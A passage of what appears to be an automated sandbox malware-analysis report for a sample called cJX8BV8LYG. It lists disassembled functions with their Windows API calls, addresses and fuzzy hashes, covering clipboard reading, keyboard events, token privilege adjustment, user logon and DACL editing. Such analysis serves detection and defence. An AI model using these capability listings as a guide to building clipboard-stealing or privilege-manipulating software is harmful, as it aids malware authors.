                                    • Source File: 00000000.00000002.1707404067.0000000001E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01E40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_1e40000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Sleep
                                    • String ID:
                                    • API String ID: 3472027048-0
                                    • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                    • Instruction ID: e31b8103e200a6fcf0bd70c1ff725fd5399b0ab31fddb08d3cfcc00ef736263f
                                    • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                    • Instruction Fuzzy Hash: FAE0BF7494010EEFDB00EFA4E5496DE7BB4EF04711F1005A1FD05D7681DB309E548A66
                                    Function 01E422A0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                    Download Yara Rule
                                    APIs
                                    • Sleep.KERNELBASE(000001F4), ref: 01E422B1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1707404067.0000000001E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01E40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_1e40000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Sleep
                                    • String ID:
                                    • API String ID: 3472027048-0
                                    • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                    • Instruction ID: 5e7da06aa7f33a58a24857da89a430eb2fd2b9a3687a8590714bf875eef781cc
                                    • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                    • Instruction Fuzzy Hash: ACE0E67494010EDFDB00EFB4D54969E7FB4EF04701F100161FD01D2281D6309D508A72

                                    Non-executed Functions

                                    Function 00819576 Relevance: 72.4, APIs: 39, Strings: 2, Instructions: 625windowkeyboardCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00799BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00799BB2
                                    • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0081961A
                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0081965B
                                    • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0081969F
                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 008196C9
                                    • SendMessageW.USER32 ref: 008196F2
                                    • GetKeyState.USER32(00000011), ref: 0081978B
                                    • GetKeyState.USER32(00000009), ref: 00819798
                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 008197AE
                                    • GetKeyState.USER32(00000010), ref: 008197B8
                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 008197E9
                                    • SendMessageW.USER32 ref: 00819810
                                    • SendMessageW.USER32(?,00001030,?,00817E95), ref: 00819918
                                    • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0081992E
                                    • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00819941
                                    • SetCapture.USER32(?), ref: 0081994A
                                    • ClientToScreen.USER32(?,?), ref: 008199AF
                                    • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 008199BC
                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 008199D6
                                    • ReleaseCapture.USER32 ref: 008199E1
                                    • GetCursorPos.USER32(?), ref: 00819A19
                                    • ScreenToClient.USER32(?,?), ref: 00819A26
                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 00819A80
                                    • SendMessageW.USER32 ref: 00819AAE
                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 00819AEB
                                    • SendMessageW.USER32 ref: 00819B1A
                                    • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00819B3B
                                    • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00819B4A
                                    • GetCursorPos.USER32(?), ref: 00819B68
                                    • ScreenToClient.USER32(?,?), ref: 00819B75
                                    • GetParent.USER32(?), ref: 00819B93
                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 00819BFA
                                    • SendMessageW.USER32 ref: 00819C2B
                                    • ClientToScreen.USER32(?,?), ref: 00819C84
                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00819CB4
                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 00819CDE
                                    • SendMessageW.USER32 ref: 00819D01
                                    • ClientToScreen.USER32(?,?), ref: 00819D4E
                                    • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00819D82
                                      • Part of subcall function 00799944: GetWindowLongW.USER32(?,000000EB), ref: 00799952
                                    • GetWindowLongW.USER32(?,000000F0), ref: 00819E05
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
                                    • String ID: @GUI_DRAGID$F
                                    • API String ID: 3429851547-4164748364
                                    • Opcode ID: f68df84c33ccda4c7e1032a265617b85aa3dcf1d0034462663403fa7ae34f732
                                    • Instruction ID: 15b51b438cace61c660fc2f194be16f946433b6e36bfdca271a65cb009654ea9
                                    • Opcode Fuzzy Hash: f68df84c33ccda4c7e1032a265617b85aa3dcf1d0034462663403fa7ae34f732
                                    • Instruction Fuzzy Hash: 96428D74204201EFDB24CF64CC58AEABBE9FF99314F144A2DF699C72A1D771A890CB51
                                    Function 00814873 Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 566windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 008148F3
                                    • SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 00814908
                                    • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00814927
                                    • SendMessageW.USER32(?,00000148,00000000,00000000), ref: 0081494B
                                    • SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 0081495C
                                    • SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 0081497B
                                    • SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 008149AE
                                    • SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 008149D4
                                    • SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 00814A0F
                                    • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00814A56
                                    • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00814A7E
                                    • IsMenu.USER32(?), ref: 00814A97
                                    • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00814AF2
                                    • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00814B20
                                    • GetWindowLongW.USER32(?,000000F0), ref: 00814B94
                                    • SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 00814BE3
                                    • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00814C82
                                    • wsprintfW.USER32 ref: 00814CAE
                                    • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00814CC9
                                    • GetWindowTextW.USER32(?,00000000,00000001), ref: 00814CF1
                                    • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00814D13
                                    • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00814D33
                                    • GetWindowTextW.USER32(?,00000000,00000001), ref: 00814D5A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
                                    • String ID: %d/%02d/%02d
                                    • API String ID: 4054740463-328681919
                                    • Opcode ID: 70c1a2e11d759848abe6ad0bf8b25df4b819de22e74f1a1090142e44d9dc07b7
                                    • Instruction ID: 9056da096c73c357f549c07d968a48a34d3f2087e8d43fb3d59a55599bd99dda
                                    • Opcode Fuzzy Hash: 70c1a2e11d759848abe6ad0bf8b25df4b819de22e74f1a1090142e44d9dc07b7
                                    • Instruction Fuzzy Hash: BB12EC71640218ABEB248F28DC49FEE7BBCFF45710F245129F516EA2A1DB789981CB50
                                    Function 0079F98E Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 0079F998
                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 007DF474
                                    • IsIconic.USER32(00000000), ref: 007DF47D
                                    • ShowWindow.USER32(00000000,00000009), ref: 007DF48A
                                    • SetForegroundWindow.USER32(00000000), ref: 007DF494
                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 007DF4AA
                                    • GetCurrentThreadId.KERNEL32 ref: 007DF4B1
                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 007DF4BD
                                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 007DF4CE
                                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 007DF4D6
                                    • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 007DF4DE
                                    • SetForegroundWindow.USER32(00000000), ref: 007DF4E1
                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 007DF4F6
                                    • keybd_event.USER32(00000012,00000000), ref: 007DF501
                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 007DF50B
                                    • keybd_event.USER32(00000012,00000000), ref: 007DF510
                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 007DF519
                                    • keybd_event.USER32(00000012,00000000), ref: 007DF51E
                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 007DF528
                                    • keybd_event.USER32(00000012,00000000), ref: 007DF52D
                                    • SetForegroundWindow.USER32(00000000), ref: 007DF530
                                    • AttachThreadInput.USER32(?,000000FF,00000000), ref: 007DF557
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                    • String ID: Shell_TrayWnd
                                    • API String ID: 4125248594-2988720461
                                    • Opcode ID: ab866d408e0260c4db66a890f715ad3477b12a1331e6e200bb2b39059ad6221c
                                    • Instruction ID: d2c6cb95768c155ebcbb0a31e8cf8ac7f534cebd4f9b3caf621ff38673a6b2ae
                                    • Opcode Fuzzy Hash: ab866d408e0260c4db66a890f715ad3477b12a1331e6e200bb2b39059ad6221c
                                    • Instruction Fuzzy Hash: 5B315271A80218BBEB216BB55C4AFFF7E7DFF44B50F104026F602E61D1C6B45D10AA60
                                    Function 007E1201 Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 241COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 007E16C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 007E170D
                                      • Part of subcall function 007E16C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 007E173A
                                      • Part of subcall function 007E16C3: GetLastError.KERNEL32 ref: 007E174A
                                    • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 007E1286
                                    • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 007E12A8
                                    • CloseHandle.KERNEL32(?), ref: 007E12B9
                                    • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 007E12D1
                                    • GetProcessWindowStation.USER32 ref: 007E12EA
                                    • SetProcessWindowStation.USER32(00000000), ref: 007E12F4
                                    • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 007E1310
                                      • Part of subcall function 007E10BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,007E11FC), ref: 007E10D4
                                      • Part of subcall function 007E10BF: CloseHandle.KERNEL32(?,?,007E11FC), ref: 007E10E9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                    • String ID: $default$winsta0
                                    • API String ID: 22674027-1027155976
                                    • Opcode ID: 5c706ee334983959664d08608794a05a699142e906e4d8a0e864097b37c40d32
                                    • Instruction ID: 9851aa5fa80c8ed9e68daba0b6f2baa63e7772dde140284f2eba653cd6fccfee
                                    • Opcode Fuzzy Hash: 5c706ee334983959664d08608794a05a699142e906e4d8a0e864097b37c40d32
                                    • Instruction Fuzzy Hash: 36819B71901289AFDF219FA5DC4AFEE7BBDFF09704F148129F911A62A0C7798944CB20
                                    Function 007E0B62 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 007E10F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 007E1114
                                      • Part of subcall function 007E10F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,007E0B9B,?,?,?), ref: 007E1120
                                      • Part of subcall function 007E10F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,007E0B9B,?,?,?), ref: 007E112F
                                      • Part of subcall function 007E10F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,007E0B9B,?,?,?), ref: 007E1136
                                      • Part of subcall function 007E10F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 007E114D
                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 007E0BCC
                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 007E0C00
                                    • GetLengthSid.ADVAPI32(?), ref: 007E0C17
                                    • GetAce.ADVAPI32(?,00000000,?), ref: 007E0C51
                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 007E0C6D
                                    • GetLengthSid.ADVAPI32(?), ref: 007E0C84
                                    • GetProcessHeap.KERNEL32(00000008,00000008), ref: 007E0C8C
                                    • HeapAlloc.KERNEL32(00000000), ref: 007E0C93
                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 007E0CB4
                                    • CopySid.ADVAPI32(00000000), ref: 007E0CBB
                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 007E0CEA
                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 007E0D0C
                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 007E0D1E
                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 007E0D45
                                    • HeapFree.KERNEL32(00000000), ref: 007E0D4C
                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 007E0D55
                                    • HeapFree.KERNEL32(00000000), ref: 007E0D5C
                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 007E0D65
                                    • HeapFree.KERNEL32(00000000), ref: 007E0D6C
                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 007E0D78
                                    • HeapFree.KERNEL32(00000000), ref: 007E0D7F
                                      • Part of subcall function 007E1193: GetProcessHeap.KERNEL32(00000008,007E0BB1,?,00000000,?,007E0BB1,?), ref: 007E11A1
                                      • Part of subcall function 007E1193: HeapAlloc.KERNEL32(00000000,?,00000000,?,007E0BB1,?), ref: 007E11A8
                                      • Part of subcall function 007E1193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,007E0BB1,?), ref: 007E11B7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                    • String ID:
                                    • API String ID: 4175595110-0
                                    • Opcode ID: 8847c810836f1c7c15129e736d18d13f82daf98732b3f15e9ea47f336f464643
                                    • Instruction ID: 124c05cb2d8f13df44a1b09b0820378b6e82ed9bf9646a8fcd16b1644b75cb9e
                                    • Opcode Fuzzy Hash: 8847c810836f1c7c15129e736d18d13f82daf98732b3f15e9ea47f336f464643
                                    • Instruction Fuzzy Hash: 51717D71A4124AEBDF10DFA5DC44BEEBBBCFF08300F148515E914E6191D7B9A945CBA0
                                    Function 007FEAFF Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • OpenClipboard.USER32(0081CC08), ref: 007FEB29
                                    • IsClipboardFormatAvailable.USER32(0000000D), ref: 007FEB37
                                    • GetClipboardData.USER32(0000000D), ref: 007FEB43
                                    • CloseClipboard.USER32 ref: 007FEB4F
                                    • GlobalLock.KERNEL32(00000000), ref: 007FEB87
                                    • CloseClipboard.USER32 ref: 007FEB91
                                    • GlobalUnlock.KERNEL32(00000000,00000000), ref: 007FEBBC
                                    • IsClipboardFormatAvailable.USER32(00000001), ref: 007FEBC9
                                    • GetClipboardData.USER32(00000001), ref: 007FEBD1
                                    • GlobalLock.KERNEL32(00000000), ref: 007FEBE2
                                    • GlobalUnlock.KERNEL32(00000000,?), ref: 007FEC22
                                    • IsClipboardFormatAvailable.USER32(0000000F), ref: 007FEC38
                                    • GetClipboardData.USER32(0000000F), ref: 007FEC44
                                    • GlobalLock.KERNEL32(00000000), ref: 007FEC55
                                    • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 007FEC77
                                    • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 007FEC94
                                    • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 007FECD2
                                    • GlobalUnlock.KERNEL32(00000000,?,?), ref: 007FECF3
                                    • CountClipboardFormats.USER32 ref: 007FED14
                                    • CloseClipboard.USER32 ref: 007FED59
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                    • String ID:
                                    • API String ID: 420908878-0
                                    • Opcode ID: 06f535fabfd237b1b8aee402ce23818e19e17ffc0dfc88e29fbc19a44e9d858d
                                    • Instruction ID: c79d934dc625e908b9ddc234cc2ec8d1f97b57e0ce69d1d4320f1896fbb7a86c
                                    • Opcode Fuzzy Hash: 06f535fabfd237b1b8aee402ce23818e19e17ffc0dfc88e29fbc19a44e9d858d
                                    • Instruction Fuzzy Hash: FB61CE74248305AFD300EF24C888F7AB7A8BF84714F08855DF696972A2DB39D905CB62
                                    Function 007F698F Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • FindFirstFileW.KERNEL32(?,?), ref: 007F69BE
                                    • FindClose.KERNEL32(00000000), ref: 007F6A12
                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 007F6A4E
                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 007F6A75
                                      • Part of subcall function 00789CB3: _wcslen.LIBCMT ref: 00789CBD
                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 007F6AB2
                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 007F6ADF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                    • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                    • API String ID: 3830820486-3289030164
                                    • Opcode ID: ec70ad3ce0d6167f782367b8eaa85ba21b749989da5d2d3c21aa0757863674a1
                                    • Instruction ID: 533d598057644c416e34539bf19acf9863d2c27fc4568d594a87bc936b8f4f93
                                    • Opcode Fuzzy Hash: ec70ad3ce0d6167f782367b8eaa85ba21b749989da5d2d3c21aa0757863674a1
                                    • Instruction Fuzzy Hash: E6D160B2548344AFC714EBA0C885EBBB7ECBF98704F04491DF685D6291EB78DA04C762
                                    Function 007F9642 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 007F9663
                                    • GetFileAttributesW.KERNEL32(?), ref: 007F96A1
                                    • SetFileAttributesW.KERNEL32(?,?), ref: 007F96BB
                                    • FindNextFileW.KERNEL32(00000000,?), ref: 007F96D3
                                    • FindClose.KERNEL32(00000000), ref: 007F96DE
                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 007F96FA
                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 007F974A
                                    • SetCurrentDirectoryW.KERNEL32(00846B7C), ref: 007F9768
                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 007F9772
                                    • FindClose.KERNEL32(00000000), ref: 007F977F
                                    • FindClose.KERNEL32(00000000), ref: 007F978F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                    • String ID: *.*
                                    • API String ID: 1409584000-438819550
                                    • Opcode ID: 6a1e00da8a1152b7b575306311585c93f7bcec5be3b4facc9c0a311790fe1c53
                                    • Instruction ID: dd9cf0cc64b7c4c9141693408d9af02746f94f135ea1128e86d0111756fbe2f1
                                    • Opcode Fuzzy Hash: 6a1e00da8a1152b7b575306311585c93f7bcec5be3b4facc9c0a311790fe1c53
                                    • Instruction Fuzzy Hash: 2531D37254021DABDB14AFB4DC08BEE77ACFF49321F108155FA25E22A0EB38DD448A64
                                    Function 007F979D Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 007F97BE
                                    • FindNextFileW.KERNEL32(00000000,?), ref: 007F9819
                                    • FindClose.KERNEL32(00000000), ref: 007F9824
                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 007F9840
                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 007F9890
                                    • SetCurrentDirectoryW.KERNEL32(00846B7C), ref: 007F98AE
                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 007F98B8
                                    • FindClose.KERNEL32(00000000), ref: 007F98C5
                                    • FindClose.KERNEL32(00000000), ref: 007F98D5
                                      • Part of subcall function 007EDAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 007EDB00
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                    • String ID: *.*
                                    • API String ID: 2640511053-438819550
                                    • Opcode ID: f4768031f569d06ba37e59795836cdce94ba04dafb2c5f6b1d2135249fd85533
                                    • Instruction ID: 872f14d250c305a0c6b90fff5c6215f68f7ea317e2667f6685aa306c4339c753
                                    • Opcode Fuzzy Hash: f4768031f569d06ba37e59795836cdce94ba04dafb2c5f6b1d2135249fd85533
                                    • Instruction Fuzzy Hash: 0131C33154021DAADB24AFB4DC48BEE77ACFF46370F108155FA20E22D0DB79DE948A60
                                    Function 007F8195 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON
                                    Download Yara Rule
                                    APIs
